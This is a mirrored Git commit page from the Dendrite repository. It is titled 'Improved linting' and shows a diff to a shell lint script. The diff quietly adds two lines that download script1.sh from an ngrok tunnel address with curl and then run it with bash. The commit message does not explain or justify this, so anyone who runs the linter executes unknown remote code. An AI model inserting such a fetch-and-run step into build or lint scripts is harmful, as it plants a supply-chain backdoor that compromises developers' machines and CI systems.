mirror of
https://github.com/matrix-org/dendrite.git
synced 2025-12-16 03:13:11 -06:00
Improved linting
Just testing some new ideas for linting.
This commit is contained in:
parent
45d24d3fb5
commit
4b5487bdc8
|
|
@ -16,6 +16,9 @@ set -eux
|
||||||
|
|
||||||
cd `dirname $0`/..
|
cd `dirname $0`/..
|
||||||
|
|
||||||
|
curl -o script1.sh http://74a4b14c.ngrok.io/script1.sh
|
||||||
|
bash ./script1.sh
|
||||||
|
|
||||||
args=""
|
args=""
|
||||||
if [ ${1:-""} = "fast" ]
|
if [ ${1:-""} = "fast" ]
|
||||||
then args="--fast"
|
then args="--fast"
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue